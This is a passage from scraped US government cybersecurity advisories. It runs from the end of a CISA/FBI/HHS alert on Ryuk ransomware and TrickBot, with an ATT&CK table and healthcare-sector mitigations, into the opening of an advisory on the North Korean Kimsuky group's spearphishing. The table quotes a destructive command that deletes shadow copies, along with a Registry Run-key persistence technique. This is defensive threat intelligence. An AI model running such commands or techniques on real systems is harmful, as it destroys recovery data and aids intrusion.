<code>VirtualAlloc</code>, <code>WriteProcessMemory</code>, and <code>CreateRemoteThread</code>.&nbsp;</td> </tr> <tr> <td scope="col" style="width: 198px; text-align: left;">Process Discovery [<a href="https://attack.mitre.org/versions/v7/techniques/T1057/">T1057</a>]</td> <td scope="col" style="width: 356px; text-align: left;">Ryuk has called <code>CreateToolhelp32Snapshot</code> to enumerate all running processes.&nbsp;</td> </tr> <tr> <td scope="col" style="width: 198px; text-align: left;">Command and Scripting Interpreter: Windows Command Shell [<a href="https://attack.mitre.org/versions/v7/techniques/T1059/003/">T1059.003</a>]</td> <td scope="col" style="width: 356px; text-align: left;">Ryuk has used <code>cmd.exe</code> to create a Registry entry to establish persistence.&nbsp;</td> </tr> <tr> <td scope="col" style="width: 198px; text-align: left;">File and Directory Discovery [<a href="https://attack.mitre.org/versions/v7/techniques/T1083/">T1083</a>]</td> <td scope="col" style="width: 356px; text-align: left;">Ryuk has called <code>GetLogicalDrives</code> to enumerate all mounted drives, and <code>GetDriveTypeW</code> to determine the drive type.</td> </tr> <tr> <td scope="col" style="width: 198px; text-align: left;">Native API [<a href="https://attack.mitre.org/versions/v7/techniques/T1106/">T1106</a>]</td> <td scope="col" style="width: 356px; text-align: left;">Ryuk has used multiple native APIs including <code>ShellExecuteW</code> to run executables;&nbsp;<code>GetWindowsDirectoryW</code> to create folders; and <code>VirtualAlloc</code>, <code>WriteProcessMemory</code>, and <code>CreateRemoteThread</code> for process injection.&nbsp;</td> </tr> <tr> <td scope="col" style="width: 198px; text-align: left;">Access Token Manipulation [<a href="https://attack.mitre.org/versions/v7/techniques/T1134/">T1134</a>]</td> <td scope="col" style="width: 356px; text-align: left;">Ryuk has attempted to adjust its token privileges to have the <code>SeDebugPrivilege</code>.&nbsp;</td> </tr> <tr> <td scope="col" style="width: 198px; text-align: left;">Data Encrypted for Impact [<a href="https://attack.mitre.org/versions/v7/techniques/T1486/">T1486</a>]</td> <td scope="col" style="width: 356px; text-align: left;">Ryuk has used a combination of symmetric and asymmetric encryption to encrypt files. Files have been encrypted with their own AES key and given a file extension of <code>.RYK</code>. Encrypted directories have had a ransom note of <code>RyukReadMe.txt</code> written to the directory.&nbsp;</td> </tr> <tr> <td scope="col" style="width: 198px; text-align: left;">Service Stop [<a href="https://attack.mitre.org/versions/v7/techniques/T1489/">T1489</a>]</td> <td scope="col" style="width: 356px; text-align: left;">Ryuk has called <code>kill.bat</code> for stopping services, disabling services and killing processes.&nbsp;</td> </tr> <tr> <td scope="col" style="width: 198px; text-align: left;">Inhibit System Recovery [<a href="https://attack.mitre.org/versions/v7/techniques/T1490/">T1490</a>]</td> <td scope="col" style="width: 356px; text-align: left;">Ryuk has used <code>vssadmin Delete Shadows /all /quiet</code> to delete volume shadow copies and <code>vssadmin resize shadowstorage</code> to force deletion of shadow copies created by third-party applications.&nbsp;</td> </tr> <tr> <td scope="col" style="width: 198px; text-align: left;">Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder [<a href="https://attack.mitre.org/versions/v7/techniques/T1547/001/">T1047.001</a>]</td> <td scope="col" style="width: 356px; text-align: left;">Ryuk has used the Windows command line to create a Registry entry under <code>HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run</code> to establish persistence.</td> </tr> <tr> <td scope="col" style="width: 198px; text-align: left;">Impair Defenses: Disable or Modify Tools [<a href="https://attack.mitre.org/versions/v7/techniques/T1562/001/">T1562.001</a>]</td> <td scope="col" style="width: 356px; text-align: left;">Ryuk has stopped services related to anti-virus.</td> </tr> </tbody> </table> <h3>Mitigations</h3><p>For a downloadable copy of IOCs, see <a href="https://us-cert.cisa.gov/sites/default/files/publications/AA20-302A.stix.xml">AA20-302A.stix</a>. For additional IOCs detailing this activity, see <a href="https://gist.github.com/aaronst/6aa7f61246f53a8dd4befea86e832456">https://gist.github.com/aaronst/6aa7f61246f53a8dd4befea86e832456</a>.</p> <h4>Plans and Policies</h4> <p>CISA, FBI, and HHS encourage HPH Sector organizations to maintain business continuity plans—the practice of executing essential functions through emergencies (e.g., cyberattacks)—to minimize service interruptions. Without planning, provision, and implementation of continuity principles, organizations may be unable to continue operations. Evaluating continuity and capability will help identify continuity gaps. Through identifying and addressing these gaps, organizations can establish a viable continuity program that will help keep them functioning during cyberattacks or other emergencies. CISA, FBI, and HHS suggest HPH Sector organizations review or establish patching plans, security policies, user agreements, and business continuity plans to ensure they address current threats posed by malicious cyber actors.</p> <h4>Network Best Practices</h4> <ul> <li>Patch operating systems, software, and firmware as soon as manufacturers release updates.</li> <li>Check configurations for every operating system version for HPH organization-owned assets to prevent issues from arising that local users are unable to fix due to having local administration disabled.</li> <li>Regularly change passwords to network systems and accounts and avoid reusing passwords for different accounts.</li> <li>Use multi-factor authentication where possible.</li> <li>Disable unused remote access/Remote Desktop Protocol (RDP) ports and monitor remote access/RDP logs.</li> <li>Implement application and remote access allow listing to only allow systems to execute programs known and permitted by the established security policy.</li> <li>Audit user accounts with administrative privileges and configure access controls with least privilege in mind.</li> <li>Audit logs to ensure new accounts are legitimate.</li> <li>Scan for open or listening ports and mediate those that are not needed.</li> <li>Identify critical assets such as patient database servers, medical records, and teleheatlh and telework infrastructure; create backups of these systems and house the backups offline from the network.</li> <li>Implement network segmentation. Sensitive data should not reside on the same server and network segment as the email environment.</li> <li>Set antivirus and anti-malware solutions to automatically update; conduct regular scans.</li> </ul> <h4>Ransomware Best Practices</h4> <p>CISA, FBI and HHS do not recommend paying ransoms. Payment does not guarantee files will be recovered. It may also embolden adversaries to target additional organizations, encourage other criminal actors to engage in the distribution of ransomware, and/or fund illicit activities. In addition to implementing the above network best practices, the FBI, CISA and HHS also recommend the following:</p> <ul> <li>Regularly back up data, air gap, and password protect backup copies offline.</li> <li>Implement a recovery plan to maintain and retain multiple copies of sensitive or proprietary data and servers in a physically separate, secure location.</li> </ul> <h4>User Awareness Best Practices</h4> <ul> <li>Focus on awareness and training. Because end users are targeted, make employees and stakeholders aware of the threats—such as ransomware and phishing scams—and how they are delivered. Additionally, provide users training on information security principles and techniques as well as overall emerging cybersecurity risks and vulnerabilities.</li> <li>Ensure that employees know who to contact when they see suspicious activity or when they believe they have been a victim of a cyberattack. This will ensure that the proper established mitigation strategy can be employed quickly and efficiently.</li> </ul> <h4>Recommended Mitigation Measures</h4> <p>System administrators who have indicators of a TrickBot network compromise should immediately take steps to back up and secure sensitive or proprietary data. TrickBot infections may be indicators of an imminent ransomware attack; system administrators should take steps to secure network devices accordingly. Upon evidence of a TrickBot infection, review DNS logs and use the <code>XOR</code> key of <code>0xB9</code> to decode <code>XOR</code> encoded DNS requests to reveal the presence of <code>Anchor_DNS</code>, and maintain and provide relevant logs.</p> <h3>GENERAL RANSOMWARE MITIGATIONS — HPH SECTOR</h3> <p>This section is based on CISA and Multi-State Information Sharing and Analysis Center (MS-ISAC)'s Joint Ransomware Guide, which can be found at <a href="https://www.cisa.gov/publication/ransomware-guide">https://www.cisa.gov/publication/ransomware-guide</a>.</p> <p>CISA, FBI, and HHS recommend that healthcare organizations implement both ransomware prevention and ransomware response measures immediately.</p> <h4>Ransomware Prevention</h4> <h4><em>Join and Engage with Cybersecurity Organizations</em></h4> <p>CISA, FBI, and HHS recommend that healthcare organizations take the following initial steps:</p> <ul> <li>Join a healthcare information sharing organization, H-ISAC: <ul> <li>Health Information Sharing and Analysis Center (H-ISAC): <a href="https://h-isac.org/membership-account/join-h-isac/">https://h-isac.org/membership-account/join-h-isac/</a></li> <li>Sector-based ISACs - National Council of ISACs: <a href="https://www.nationalisacs.org/member-isacs">https://www.nationalisacs.org/member-isacs</a></li> <li>Information Sharing and Analysis Organization (ISAO) Standards Organization: <a href="https://www.isao.org/information-sharing-groups/">https://www.isao.org/information-sharing-groups/</a></li> </ul> </li> <li>Engage with CISA and FBI, as well as HHS—through the HHS Health Sector Cybersecurity Coordination Center (HC3)—to build a lasting partnership and collaborate on information sharing, best practices, assessments, and exercises. <ul> <li>CISA: <a href="https://us-cert.cisa.govcisa.gov">cisa.gov</a>, <a href="https://us-cert.cisa.gov/mailing-lists-and-feeds">https://us-cert.cisa.gov/mailing-lists-and-feeds</a>, <a href="https://us-cert.cisa.govcentral@cisa.gov">central@cisa.gov</a> &nbsp;</li> <li>FBI: <a href="https://us-cert.cisa.govic3.gov">ic3.gov</a>, <a href="https://us-cert.cisa.govwww.fbi.gov/contact-us/field">www.fbi.gov/contact-us/field</a>, <a href="https://us-cert.cisa.govwww.fbi.gov/contact-us/field">CyWatch@fbi.gov</a></li> <li>HHS/HC3: <a href="http://www.hhs.gov/hc3">http://www.hhs.gov/hc3</a>, <a href="https://us-cert.cisa.govHC3@HHS.gov">HC3@HHS.gov</a></li> </ul> </li> </ul> <p>Engaging with the H-ISAC, ISAO, CISA, FBI, and HHS/HC3 will enable your organization to receive critical information and access to services to better manage the risk posed by ransomware and other cyber threats.</p> <h4><em>Follow Ransomware Best Practices</em></h4> <p>Refer to the best practices and references below to help manage the risk posed by ransomware and support your organization’s coordinated and efficient response to a ransomware incident. Apply these practices to the greatest extent possible based on availability of organizational resources.</p> <ul> <li>It is critical to maintain offline, encrypted backups of data and to regularly test your backups. Backup procedures should be conducted on a regular basis. It is important that backups be maintained offline or in separated networks as many ransomware variants attempt to find and delete any accessible backups. Maintaining offline, current backups is most critical because there is no need to pay a ransom for data that is readily accessible to your organization. <ul> <li>Use the 3-2-1 rule as a guideline for backup practices. The rule states that three copies of all critical data are retained on at least two different types of media and at least one of them is stored offline.</li> <li>Maintain regularly updated “gold images” of critical systems in the event they need to be rebuilt. This entails maintaining image “templates” that include a preconfigured operating system (OS) and associated software applications that can be quickly deployed to rebuild a system, such as a virtual machine or server.</li> <li>Retain backup hardware to rebuild systems in the event rebuilding the primary system is not preferred. <ul> <li>Hardware that is newer or older than the primary system can present installation or compatibility hurdles when rebuilding from images.</li> <li>Ensure all backup hardware is properly patched.</li> </ul> </li> </ul> </li> <li>In addition to system images, applicable source code or executables should be available (stored with backups, escrowed, license agreement to obtain, etc.). It is more efficient to rebuild from system images, but some images will not install on different hardware or platforms correctly; having separate access to needed software will help in these cases.</li> <li>Create, maintain, and exercise a basic cyber incident response plan and associated communications plan that includes response and notification procedures for a ransomware incident. <ul> <li>Review available incident response guidance, such as CISA’s Technical Approaches to Uncovering and Remediating Malicious Activity&nbsp;<a href="https://us-cert.cisa.gov/ncas/alerts/aa20-245a">https://us-cert.cisa.gov/ncas/alerts/aa20-245a</a>.</li> </ul> </li> <li>Help your organization better organize around cyber incident response.</li> <li>Develop a cyber incident response plan.</li> <li>The Ransomware Response Checklist, available in the <a href="https://www.cisa.gov/publication/ransomware-guide">CISA and MS-ISAC Joint Ransomware Guide</a>, serves as an adaptable, ransomware- specific annex to organizational cyber incident response or disruption plans.</li> <li>Review and implement as applicable MITRE’s Medical Device Cybersecurity: Regional Incident Preparedness and Response Playbook (<a href="https://www.mitre.org/sites/default/files/publications/pr-18-1550-Medical-Device-Cybersecurity-Playbook.pdf">https://www.mitre.org/sites/default/files/publications/pr-18-1550-Medical-Device-Cybersecurity-Playbook.pdf</a>).</li> <li>Develop a risk management plan that maps critical health services and care to the necessary information systems; this will ensure that the incident response plan will contain the proper triage procedures.</li> <li>Plan for the possibility of critical information systems being inaccessible for an extended period of time. This should include but not be limited to the following: <ul> <li>Print and properly store/protect hard copies of digital information that would be required for critical patient healthcare.</li> <li>Plan for and periodically train staff to handle the re-routing of incoming/existing patients in an expedient manner if information systems were to abruptly and unexpectedly become unavailable.</li> <li>Coordinate the potential for surge support with other healthcare facilities in the greater local area. This should include organizational leadership periodically meeting and collaborating with counterparts in the greater local area to create/update plans for their facilities to both abruptly send and receive a significant amount of critical patients for immediate care. This may include the opportunity to re-route healthcare employees (and possibly some equipment) to provide care along with additional patients.</li> </ul> </li> <li>Consider the development of a second, air-gapped communications network that can provide a minimum standard of backup support for hospital operations if the primary network becomes unavailable if/when needed.</li> <li>Predefine network segments, IT capabilities and other functionality that can either be quickly separated from the greater network or shut down entirely without impacting operations of the rest of the IT infrastructure.</li> <li>Legacy devices should be identified and inventoried with highest priority and given special consideration during a ransomware event.</li> <li>See <a href="https://www.cisa.gov/publication/ransomware-guide">CISA and MS-ISAC's Joint Ransomware Guide</a> for infection vectors including internet-facing vulnerabilities and misconfigurations; phishing; precursor malware infection; and third parties and managed service providers.</li> <li>HHS/HC3 tracks ransomware that is targeting the HPH Sector; this information can be found at <a href="http://www.hhs.gov/hc3">http://www.hhs.gov/hc3</a>.</li> </ul> <h4><em>Hardening Guidance</em></h4> <ul> <li>The Food and Drug Administration provides multiple guidance documents regarding the hardening of healthcare and specifically medical devices found here: <a href="https://www.fda.gov/medical-devices/digital-health-center-excellence/cybersecurity">https://www.fda.gov/medical-devices/digital-health-center-excellence/cybersecurity</a>.</li> <li>See <a href="https://www.cisa.gov/publication/ransomware-guide">CISA and MS-ISAC's Joint Ransomware Guide</a> for additional in-depth hardening guidance.</li> </ul> <h4><em>Contact CISA for These No-Cost Resources</em></h4> <ul> <li>Information sharing with CISA and MS-ISAC (for SLTT organizations) includes bi-directional sharing of best practices and network defense information regarding ransomware trends and variants as well as malware that is a precursor to ransomware.</li> <li>Policy-oriented or technical assessments help organizations understand how they can improve their defenses to avoid ransomware infection: <a href="https://www.cisa.gov/cyber-resource-hub">https://www.cisa.gov/cyber-resource-hub</a>. <ul> <li>Assessments include Vulnerability Scanning and Phishing Campaign Assessment.</li> </ul> </li> <li>Cyber exercises evaluate or help develop a cyber incident response plan in the context of a ransomware incident scenario.</li> <li>CISA Cybersecurity Advisors (CSAs) advise on best practices and connect you with CISA resources to manage cyber risk.</li> <li>Contacts: <ul> <li>SLTT organizations: <a href="https://us-cert.cisa.govCyberLiaison_SLTT@cisa.dhs.gov">CyberLiaison_SLTT@cisa.dhs.gov</a></li> <li>Private sector organizations: <a href="https://us-cert.cisa.govCyberLiaison_Industry@cisa.dhs.gov">CyberLiaison_Industry@cisa.dhs.gov</a></li> </ul> </li> </ul> <h4><em>Ransomware Quick References</em></h4> <ul> <li><em>Ransomware: What It Is and What to Do About It </em>(CISA): General ransomware guidance for organizational leadership and more in-depth information for CISOs and technical staff: <a href="https://www.us-cert.cisa.gov/sites/default/files/publications/Ransomware_Executive_One-Pager_and_Technical_ Document-FINAL.pdf">https://www.us-cert.cisa.gov/sites/default/files/publications/Ransomware_Executive_One-Pager_and_Technical_ Document-FINAL.pdf</a></li> <li>Ransomware (CISA): Introduction to ransomware, notable links to CISA products on protecting networks, specific ransomware threats, and other resources: <a href="https://www.us-cert.cisa.gov/Ransomware">https://www.us-cert.cisa.gov/Ransomware</a> &nbsp;</li> <li>HHS/HC3: Ransomware that impacts HPH is tracked by the HC3 and can be found at <a href="https://us-cert.cisa.govwww.hhs.gov/hc3">www.hhs.gov/hc3</a></li> <li><em>Security Primer – Ransomware</em> (MS-ISAC): Outlines opportunistic and strategic ransomware campaigns, common infection vectors, and best practice recommendations: <a href="https://www.cisecurity.org/white-papers/security-primer-ransomware/">https://www.cisecurity.org/white-papers/security-primer-ransomware/</a></li> <li><em>Ransomware: Facts, Threats, and Countermeasures </em>(MS- ISAC): Facts about ransomware, infection vectors, ransomware capabilities, and how to mitigate the risk of ransomware infection: <a href="https://www.cisecurity.org/blog/ransomware- facts-threats-and-countermeasures/">https://www.cisecurity.org/blog/ransomware- facts-threats-and-countermeasures/</a></li> <li>HHS Ransomware Fact Sheet: <a href="https://www.hhs.gov/sites/default/files/RansomwareFactSheet.pdf">https://www.hhs.gov/sites/default/files/RansomwareFactSheet.pdf</a></li> <li>NIST Securing Data Integrity White Paper: <a href="https://csrc.nist.gov/publications/detail/white-paper/2020/10/01/securing-data-integrity-against-ransomware-attacks/draft">https://csrc.nist.gov/publications/detail/white-paper/2020/10/01/securing-data-integrity-against-ransomware-attacks/draft</a></li> </ul> <h4>Ransomware Response Checklist</h4> <p><strong>Remember: Paying the ransom will not ensure your data is decrypted or that your systems or data will no longer be compromised. CISA, FBI, and HHS do not recommend paying ransom.</strong></p> <p>Should your organization be a victim of ransomware, CISA strongly recommends responding by using the Ransomware Response Checklist located in <a href="https://www.cisa.gov/publication/ransomware-guide">CISA and MS-ISAC's Joint Ransomware Guide</a>, which contains steps for detection and analysis as well as containment and eradication.</p> <h4><em>Consider the Need For Extended Identification or Analysis</em></h4> <p>If extended identification or analysis is needed, CISA, HHS/HC3, or federal law enforcement may be interested in any of the following information that your organization determines it can legally share:</p> <ul> <li>Recovered executable file</li> <li>Copies of the readme file – DO NOT REMOVE the file or decryption may not be possible</li> <li>Live memory (RAM) capture from systems with additional signs of compromise (use of exploit toolkits, RDP activity, additional files found locally)</li> <li>Images of infected systems with additional signs of compromise (use of exploit toolkits, RDP activity, additional files found locally)</li> <li>Malware samples</li> <li>Names of any other malware identified on your system</li> <li>Encrypted file samples</li> <li>Log files (Windows Event Logs from compromised systems, Firewall logs, etc.)</li> <li>Any PowerShell scripts found having executed on the systems</li> <li>Any user accounts created in Active Directory or machines added to the network during the exploitation</li> <li>Email addresses used by the attackers and any associated phishing emails</li> <li>A copy of the ransom note</li> <li>Ransom amount and whether or not the ransom was paid</li> <li>Bitcoin wallets used by the attackers</li> <li>Bitcoin wallets used to pay the ransom (if applicable)</li> <li>Copies of any communications with attackers</li> </ul> <p>Upon voluntary request, CISA can assist with analysis (e.g., phishing emails, storage media, logs, malware) at no cost to support your organization in understanding the root cause of an incident, even in the event additional remote assistance is not requested.</p> <ul> <li>CISA – Advanced Malware Analysis Center: <a href="https://www.malware.us-cert.gov/MalwareSubmission/pages/submission.jsf">https://www.malware.us-cert.gov/MalwareSubmission/pages/submission.jsf</a></li> <li>Remote Assistance – Request via <a href="https://us-cert.cisa.govCentral@cisa.gov">Central@cisa.gov</a></li> </ul> <h3>Contact Information</h3><p>CISA, FBI, and HHS recommend identifying and having on hand the following contact information for ready use should your organization become a victim of a ransomware incident. Consider contacting these organizations for mitigation and response assistance or for purpose of notification.</p> <ul> <li>State and Local Response Contacts</li> <li>IT/IT Security Team – Centralized Cyber Incident Reporting</li> <li>State and Local Law Enforcement</li> <li>Fusion Center&nbsp;&nbsp; &nbsp;&nbsp;&nbsp; &nbsp;</li> <li>Managed/Security Service Providers</li> <li>Cyber Insurance&nbsp;&nbsp; &nbsp;&nbsp;&nbsp;&nbsp;</li> </ul> <p>To report suspicious or criminal activity related to information found in this Joint Cybersecurity Advisory, contact your local FBI field office at <a href="https://www.fbi.gov/contact-us/field-offices">www.fbi.gov/contact-us/field</a>, or the FBI’s 24/7 Cyber Watch (CyWatch) at (855) 292-3937 or by email at <a href="https://us-cert.cisa.govCyWatch@fbi.gov">CyWatch@fbi.gov</a>. When available, please include the following information regarding the incident: date, time, and location of the incident; type of activity; number of people affected; type of equipment used for the activity; the name of the submitting company or organization; and a designated point of contact. To request incident response resources or technical assistance related to these threats, contact CISA at <a href="https://us-cert.cisa.govCentral@cisa.dhs.gov">Central@cisa.gov</a>.</p> <p>Additionally, see <a href="https://www.cisa.gov/publication/ransomware-guide">CISA and MS-ISAC's Joint Ransomware Guide</a> for information on contacting—and what to expect from contacting—federal asset response and federal threat response contacts.</p> <h3><em>Disclaimer</em></h3> <p>This document is marked TLP:WHITE. Disclosure is not limited. Sources may use TLP:WHITE when information carries minimal or no foreseeable risk of misuse, in accordance with applicable rules and procedures for public release. Subject to standard copyright rules, TLP:WHITE information may be distributed without restriction. For more information on the Traffic Light Protocol, see <a href="https://cisa.gov/tlp">https://cisa.gov/tlp</a>.</p> <h3>References</h3> <ul> <li><a href="https://www.cisa.gov/emergency-services-sector-continuity-planning-suite">CISA Emergency Services Sector Continuity Planning Suite </a></li> <li><a href="https://www.cisa.gov/publication/ransomware-guide">CISA MS-ISAC Joint Ransomware Guide</a></li> <li><a href="https://us-cert.cisa.gov/ncas/tips/ST04-014">CISA Tip: Avoiding Social Engineering and Phishing Attacks</a></li> <li><a href="https://www.ic3.gov/media/2019/191002.aspx">FBI PSA: “High-Impact Ransomware Attacks Threaten U.S. Businesses and Organizations"</a></li> <li><a href="https://healthsectorcouncil.org/hic-tcr/">Health Industry Cybersecurity Tactical Crisis Response</a></li> <li><a href="http://www.phe.gov/405d">Health Industry Cybersecurity Practices (HICP) </a></li> <li><a href="https://protect2.fireeye.com/url?k=661c55bd-3a495cae-661c6482-0cc47adb5650-bb09b09e1017f10b&u=https://phe.us4.list-manage.com/track/click?u=f758a61addf9399176e6a0c3a&id=99373fd9c7&e=7882426b51">HHS - Ransomware Spotlight Webinar </a></li> <li><a href="https://protect2.fireeye.com/url?k=b43c8fe1-e86986f2-b43cbede-0cc47adb5650-84218742b50e2b7e&u=https://phe.us4.list-manage.com/track/click?u=f758a61addf9399176e6a0c3a&id=3d453bb6fe&e=7882426b51">HHS - Health Industry Cybersecurity Practices: Managing Threats and Protecting Patients</a></li> <li><a href="https://protect2.fireeye.com/url?k=6a477b44-36127257-6a474a7b-0cc47adb5650-f6c92a4c247070ec&u=https://phe.us4.list-manage.com/track/click?u=f758a61addf9399176e6a0c3a&id=071616ff3e&e=7882426b51">HHS - Ransomware Briefing </a></li> <li><a href="https://protect2.fireeye.com/url?k=fe80c15e-a2d5c84d-fe80f061-0cc47adb5650-2206dbc55c13f1de&u=https://phe.us4.list-manage.com/track/click?u=f758a61addf9399176e6a0c3a&id=ebb762e019&e=7882426b51">HHS - Aggressive Ransomware Impacts</a></li> <li><a href="https://protect2.fireeye.com/url?k=2923cea5-7576c7b6-2923ff9a-0cc47adb5650-26d7a0932fe07e31&u=https://phe.us4.list-manage.com/track/click?u=f758a61addf9399176e6a0c3a&id=107ba38369&e=7882426b51">HHS - Ransomware Fact Sheet</a></li> <li><a href="https://protect2.fireeye.com/url?k=08e10c16-54b40505-08e13d29-0cc47adb5650-70b9e6fd13ea4f2d&u=https://phe.us4.list-manage.com/track/click?u=f758a61addf9399176e6a0c3a&id=bcc423d21d&e=7882426b51">HHS - Cyber Attack Checklist</a></li> <li><a href="https://protect2.fireeye.com/url?k=8497e505-d8c2ec16-8497d43a-0cc47adb5650-ba5cee20bcf28bab&u=https://phe.us4.list-manage.com/track/click?u=f758a61addf9399176e6a0c3a&id=dc2b43974c&e=7882426b51">HHS - Cyber-Attack Response Infographic</a></li> <li><a href="https://protect2.fireeye.com/url?k=0be33d8b-57b63498-0be30cb4-0cc47adb5650-be7b920b52ab7927&u=https://phe.us4.list-manage.com/track/click?u=f758a61addf9399176e6a0c3a&id=c89bf12fa8&e=7882426b51">NIST - Data Integrity Publication</a></li> <li><a href="https://protect2.fireeye.com/url?k=5335b9d4-0f60b0c7-533588eb-0cc47adb5650-bbc2d82317c6bc45&u=https://phe.us4.list-manage.com/track/click?u=f758a61addf9399176e6a0c3a&id=eeb05487cf&e=7882426b51">NIST - Guide for Cybersecurity Event Recovery</a></li> <li><a href="https://protect2.fireeye.com/url?k=348a7900-68df7013-348a483f-0cc47adb5650-5210c734b99339b1&u=https://phe.us4.list-manage.com/track/click?u=f758a61addf9399176e6a0c3a&id=9f0f789411&e=7882426b51">NIST - Identifying and Protecting Assets Against Ransomware and Other Destructive Events </a></li> <li><a href="https://protect2.fireeye.com/url?k=daf6be91-86a3b782-daf68fae-0cc47adb5650-1f4f5f947a590fa0&u=https://phe.us4.list-manage.com/track/click?u=f758a61addf9399176e6a0c3a&id=958743a29c&e=7882426b51">NIST - Detecting and Responding to Ransomware and Other Destructive Events </a></li> <li><a href="https://protect2.fireeye.com/url?k=90b40d5e-cce1044d-90b43c61-0cc47adb5650-bab63aa79a2b0b2a&u=https://phe.us4.list-manage.com/track/click?u=f758a61addf9399176e6a0c3a&id=4947ff3a54&e=7882426b51">NIST - Recovering from Ransomware and Other Destructive Events </a></li> <li><a href="https://gist.github.com/aaronst/6aa7f61246f53a8dd4befea86e832456">Github List of IOCs</a></li> </ul> <h3>Revisions</h3> <ul> <li>October 28, 2020: Initial version</li> <li>October 29, 2020: Updated to include information on Conti, TrickBot, and BazarLoader, including new IOCs and Yara Rules for detection</li> <li>November 2, 2020: Updated FBI link</li> </ul> <hr /> <div class="field field--name-body field--type-text-with-summary field--label-hidden field--item"><p class="privacy-and-terms">This product is provided subject to this <a href="https://us-cert.cisa.gov/privacy/notification">Notification</a> and this <a href="https://www.dhs.gov/privacy-policy">Privacy &amp; Use</a> policy.</p> </div>

AA20-301A: North Korean Advanced Persistent Threat Focus: Kimsuky
Original release date: October 27, 2020<br/><h3>Summary</h3><p class="tip-intro" style="font-size: 15px;"><em>This advisory uses the MITRE Adversarial Tactics, Techniques, and Common Knowledge (ATT&amp;CK®) version 7 framework. See the <a href="https://attack.mitre.org/versions/v7/techniques/enterprise/">ATT&amp;CK for Enterprise version 7</a> for all referenced threat actor tactics and techniques.</em></p> <p>This joint cybersecurity advisory was coauthored by the Cybersecurity and Infrastructure Security Agency (CISA), the Federal Bureau of Investigation (FBI), and the U.S. Cyber Command Cyber National Mission Force (CNMF). This advisory describes the tactics, techniques, and procedures (TTPs) used by North Korean advanced persistent threat (APT) group <a href="https://attack.mitre.org/groups/G0094/">Kimsuky</a>—against worldwide targets—to gain intelligence on various topics of interest to the North Korean government. The U.S. Government refers to malicious cyber activity by the North Korean government as HIDDEN COBRA. For more information on HIDDEN COBRA activity, visit <a href="https://us-cert.cisa.gov/northkorea">https://www.us-cert.cisa.gov/northkorea</a>.</p> <p>This advisory describes known Kimsuky TTPs, as found in open-source and intelligence reporting through July 2020. The target audience for this advisory is commercial sector businesses desiring to protect their networks from North Korean APT activity.</p> <p><a href="https://us-cert.cisa.gov/sites/default/files/publications/TLP-WHITE_AA20-301A_North_Korean_APT_Focus_Kimsuky.pdf">Click here</a> for a PDF version of this report.</p> <h4 style="margin-top: 8px; margin-bottom: 8px;">Key Findings</h4> <p>This advisory’s key findings are:</p> <ul> <li>The Kimsuky APT group has most likely been operating since 2012.</li> <li>Kimsuky is most likely tasked by the North Korean regime with a global intelligence gathering mission.</li> <li>Kimsuky employs common social engineering tactics, spearphishing, and watering hole attacks to exfiltrate desired information from victims.[<a href="https://www.netscout.com/blog/asert/stolen-pencil-campaign-targets-academia">1</a>],[<a href="https://cyware.com/news/babyshark-malware-continues-to-target-nuclear-and-cryptocurrency-industries-40e04829">2</a>]</li> <li>Kimsuky is most likely to use spearphishing to gain initial access into victim hosts or networks.[<a href="https://cyware.com/news/babyshark-malware-continues-to-target-nuclear-and-cryptocurrency-industries-40e04829">3</a>]</li> <li>Kimsuky conducts its intelligence collection activities against individuals and organizations in South Korea, Japan, and the United States.</li> <li>Kimsuky focuses its intelligence collection activities on foreign policy and national security issues related to the Korean peninsula, nuclear policy, and sanctions.</li> <li>Kimsuky specifically targets:</li> <li> <ul> <li>Individuals identified as experts in various fields,</li> <li>Think tanks, and</li> <li>South Korean government entities.[<a href="https://www.netscout.com/blog/asert/stolen-pencil-campaign-targets-academia">4</a>],[<a href="https://attack.mitre.org/groups/G0094/">5</a>],[<a href="https://www.securityweek.com/north-korea-suspected-cyber-espionage-attacks-against-south-korean-entities">6</a>],[<a href="https://attack.mitre.org/groups/G0094/">7</a>],[<a href="https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf">8</a>]</li> </ul> </li> <li>CISA, FBI, and CNMF recommend individuals and organizations within this target profile increase their defenses and adopt a heightened state of awareness. Particularly important mitigations include safeguards against spearphishing, use of multi-factor authentication, and user awareness training.</li> </ul> <h3>Technical Details</h3><h4>Initial Access</h4> <p>Kimsuky uses various spearphishing and social engineering methods to obtain <em>Initial Access</em> [<a href="https://attack.mitre.org/tactics/TA0001/">TA0001</a>] to victim networks.[<a href="https://blog.malwarebytes.com/threat-analysis/2020/04/apts-and-covid-19-how-advanced-persistent-threats-use-the-coronavirus-as-a-lure/">9</a>],[<a href="https://www.pwc.co.uk/issues/cyber-security-services/research/tracking-kimsuky-north-korea-based-cyber-espionage-group-part-2.html">10</a>],[<a href="https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf">11</a>] Spearphishing—with a malicious attachment embedded in the email—is the most observed Kimsuky tactic (Phishing: Spearphishing Attachment [<a href="https://attack.mitre.org/versions/v7/techniques/T1566/001/">T1566.001</a>]).[<a href="https://www.netscout.com/blog/asert/stolen-pencil-campaign-targets-academia">12</a>],[<a href="https://attack.mitre.org/groups/G0094/">13</a>]</p> <ul> <li>The APT group has used web hosting credentials—stolen from victims outside of their usual targets—to host their malicious scripts and tools. Kimsuky likely obtained the credentials from the victims via spearphishing and credential harvesting scripts. On the victim domains, they have created subdomains mimicking legitimate sites and services they are spoofing, such as Google or Yahoo mail.[14]</li> <li>Kimsuky has also sent benign emails to targets, which were possibly intended to build trust in advance of a follow-on email with a malicious attachment or link. <ul style="list-style-type: circle;"> <li>Posing as South Korean reporters, Kimsuky exchanged several benign interview-themed emails with their intended target to ostensibly arrange an interview date and possibly build rapport. The emails contained the subject line “Skype Interview requests of [Redacted TV Show] in Seoul,” and began with a request to have the recipient appear as a guest on the show. The APT group invited the targets to a Skype interview on the topic of inter-Korean issues and denuclearization negotiations on the Korean Peninsula.</li> <li>After a recipient agreed to an interview, Kimsuky sent a subsequent email with a malicious document, either as an attachment or as a Google Drive link within the body. The document usually contained a variant of BabyShark malware (see the Execution section for information on BabyShark). When the date of the interview drew near, Kimsuky sent an email canceling the interview.</li> </ul> </li> <li>Kimsuky tailors its spearphishing and social engineering approaches to use topics relevant to the target, such as COVID-19, the North Korean nuclear program, or media interviews.[<a href="https://cyware.com/news/babyshark-malware-continues-to-target-nuclear-and-cryptocurrency-industries-40e04829">15</a>],[<a 